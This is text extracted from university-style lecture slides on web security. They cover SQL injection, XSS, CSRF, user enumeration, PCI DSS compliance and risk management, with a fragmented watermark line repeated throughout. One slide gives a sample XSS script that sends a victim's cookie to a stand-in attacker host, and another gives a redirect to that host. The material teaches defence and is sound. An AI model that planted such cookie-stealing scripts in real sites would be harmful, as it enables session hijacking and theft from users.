-- Check for un-escaped special characters in input strings
! @ $ % ^ & * ( ) -_ + ` ~ \ | [ ] { } ; : ' " ? / , . > <
• Authentication mechanisms using technologies such as JavaScript or ActiveX (hard for developers t understand attacks such as XSS, XSRF)
• Lack of re-authenticating the user before issuing new passwords or performing critical tasks
• Hosting of uncontrolled data on a protected domain
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
117
Web SecurityBeware of Identifiable Characteristics
• Comment Lines
• URL Extensions
• Meta Tags
• Cookies
• Client-side scripting languages
• Error and Response Codes
- HTTP Response Headers
- Error Messages
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
118
Web SecurityUsername/Password Enumeration
• The attacker will try to send particular requests to the application to check if it replies back in different manners
• The message from the web-server needs to be different when something is correct and when something is wrong
-- “Invalid Username”, “Incorrect Password”
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
119
Web Security• The attacker has now some information to proceed in his attack, e.g. a
valid username
• The application should not reveal, directly or indirectly, any information useful for enumerating users
• In case of wrong username/password, the application should return generic messages
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
120
Web SecuritySQL Injection
• The attack behind most of the data breaches
• Attacker’s target is to extract information from the Server’s DB
• It is an input validation vulnerability, where unsanitized user input in SQL query to back-end DB changes the meaning of query
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
121
Web Security• Typical Login Prompt
• User Input Becomes Part of Query
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
122
Web Security• Malicious User Input
• SQL Injection Attack
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
123
Web SecurityCardSystems Attack (June 2005)
CardSystems was a major credit card processing company
Put out of business by a SQL injection attack !
- Credit Card numbers stored unencrypted
- Data on 263,000 accounts stolen
- 43M identities Exposed
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
124
Web SecurityCountermeasures
• Input Validation
- Filter: apostrophes, semicolons, percent symbols, hyphens, any character with special meaning
- Check the data type
• Whitelisting
- Blacklisting “bad” characters does not really work
- Whitelist a well-defined set of safe values
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
125
Web Security
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
126
Web SecurityCross-Site Scripting (XSS)
- Attack targets the user of the system rather than the system itself
- Outside client-side languages, executing within the users web environment with the same level of privileges as the hosted site
- USE CSS to exploit a browser hole to download a Trojan/virus
- Client-Side scripting languages
-- DHTML (HTML,XHTML,HTML x.o)
-- Javascript, Java(applets), VBScript
-- Flash, ActiveX, XML/XSL, CSS
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
127
Web Security1. Attacker injects malicious code into vulnerable web server
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
128
Web Security1. Attacker injects malicious code into vulnerable web server
2. Victim visits vulnerable web server
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
129
Web Security1. Attacker injects malicious code into vulnerable web server
2. Victim visits vulnerable web server
3. Malicious code is served to victim by web server
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
130
Web Security1. Attacker injects malicious code into vulnerable web server
2. Victim visits vulnerable web server
3. Malicious code is served to victim by web server
4. Malicious code executes on the victims with web server’s privileges
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
131
Web SecurityStealing cookie via XSS
• Attacker injects script that reads the site’s cookie
• Scripts send the cookie to the attacker
• Attacker can now log into the victim’s site
<script>
var img = new Image();
img.src = “http://evil.com/log_cookie.php?” + document.cookie
</script>
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
132
Web SecurityRedirect the user via XSS
• Attacker injects script that automatically redirects victim to attacker’s site
<script>document.location = “http://evil.com”;
</script>
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
133
Web SecurityPhishing via XSS
• Attacker injects a script that redirects the victim to a “familiar website” (e.g. the site of a bank)
• Fake page asks for user’s credentials or other sensitive information
• The attacker now has everything needed to login (and transfer money)
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
134
Web SecurityPrivacy Violation via XSS
• Attacker’s script determines the sites the victim has visited in the past
• This information can be used for targeted phishing attacks
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
135
Web SecurityCross-Site Request Forgery (CSRF)
1. Victim is logged into vulnerable web site
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
136
Web SecurityCross-Site Request Forgery (CSRF)
1. Victim is logged into vulnerable web site
2. Victim visits attacker’s web site
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
137
Web SecurityCross-Site Request Forgery (CSRF)
1. Victim is logged into vulnerable web site
2. Victim visits attacker’s web site
3. Malicious content is delivered to victim
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
138
Web SecurityCross-Site Request Forgery (CSRF)
1. Victim is logged into vulnerable web site
2. Victim visits attacker’s web site
3. Malicious content is delivered to victim
4. Victim involuntarily sends a request to the vulnerable web site
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
139
Web SecuritySQL Injection
Attacker submits HTTP request with a malicious parameters value that modifies an existing SQL query, or adds new queries
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
140
Web SecuritySQL Injection
Attacker submits HTTP request with a malicious parameters value that modifies an existing SQL query, or adds new queries
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
141
Web Security• Misconfiguration
- outdated versions of the server
- outdated versions of third party web applications
- guessable passwords (application, FTP/SSH)
- retrievable source code
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
142
Web Security• Do not rely on client-side controls that are not enforced on the server-side
-- Cookie
Cookie: role=guest
Cookie: role=admin
-- Hidden form parameters
<input type=“hidden” name=“role” value=“guest”>
<input type=“hidden” name=“role” value=“admin”>
-- JavaScript checks
function validateRole() { return 1;}
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
143
Web Security• Authentication Errors
- weak passwords
- brute forceable (enforce upper limit on the number of errors in a give time)
- verbose failure messages (“wrong password”): Do not leak information
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
144
Compliance
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
145
PCI DSSPayment Card Industry Data Security Standard (PCI-DSS)
• A proprietary information security standard for organizations that handle branded credit cards from major card schemes
(Visa, MasterCard, American Express, Discover, JCB and China UnionPay)
• Private cards which are not part of a major card scheme are not included in the score of PCI DSS
• It is mandated by card brands and administrated by Payment Card Industry Security Standards Council
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
146
PCI DSS• Its purpose is to increase controls around cardholder data to reduce
credit card fraud via its exposure
• Validation of compliance
- needs to be every year
- either by external Qualified Security Accessor (QSA) that creates a Report on Compliance (ROC) for organizations handling large volumes of transactions
- or by Self-Assessment Questionnaire (SAQ) for companies handling smaller volumes
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
147
PCI DSS• PCI DSS originally began as 5 different programs
- Visa’s Cardholder Information Security Program
- MasterCard’s Site Data Protection
- American Express’ Data Security Operating Policy
- Discover’s Information Security and Compliance
- JCB’s Data Security Program
• All 5 programs had same targets
- create additional level of protection for card issuers
- ensure merchants meet minimum level of security when store/process/transmit cardholder data
• PCI SSC was formed on Dec 2004 when these 5 companies released PCI DSS
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
148
PCI DSS• Version 1.0 (Dec 2004)
• Version 1.1 (Sep 2006) – clarifications on v1.0
• Version 1.2 (Oct 2008) – enhancements on addressing risks and threats
• Version 2.0 (Oct 2010)
• Version 3.0 (Nov 2013)
• Version 3.1 (Apr 2015) – current one
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
149
PCI DSSPCI DSS specifies 12 requirements for compliance, organized into 6 logically related groups called “control objectives”
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
150
PCI DSSPCI SSC released several supplemental pieces of information for extra clarification
• Information Supplement: Requirement 11.3 Penetration Testing
• Information Supplement: Requirement 6.6 Code Reviews and Application Firewalls Clarified
• Navigating the PCI DSS: Understanding the Intent of the Requirements
• Information Supplement: PCI DSS Wireless Guidelines
• In the event of a security breach, any compromised entity which WAS NOT PCI DSS compliant at the time of breach will be subject to additional card scheme penalties, such as fines
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
151
Risk Management Framework
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
152
Risk Management Framework
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
153
Risk Management FrameworkIdentify
- Ensure your company I.T. Governance policies exist and are current
- Verify all key stakeholders members know about it
Protect
- Known how your data flows
- Understand where it flows from and to and how it’s protected
- Check for vulnerabilities and data leakage
- Policies exist current and follow governance
- Seek insurance policies to help the risk
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
154
Risk Management FrameworkDetect
- Detection for anomalies are in place
- Real word testing is performed periodically
Respond
- Review action plans associated with the event of a breach
- Are skilled personnel on hand in the event of a breach?
Recover
- Establish a recovery plan to implement after a breach
- Prepare communication of recovery to internal and external parties affected
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
155
Conclusions• No business is immune from a data breach
• Security is a boardroom issue
• Many executive don’t understand their organization’s information data flow and/or how its being protected
• Threats can come in all sorts of shapes and sizes
• Insider misuse lead to inadvertent data leakage and breaches
• The threat is not only technical, educate your employees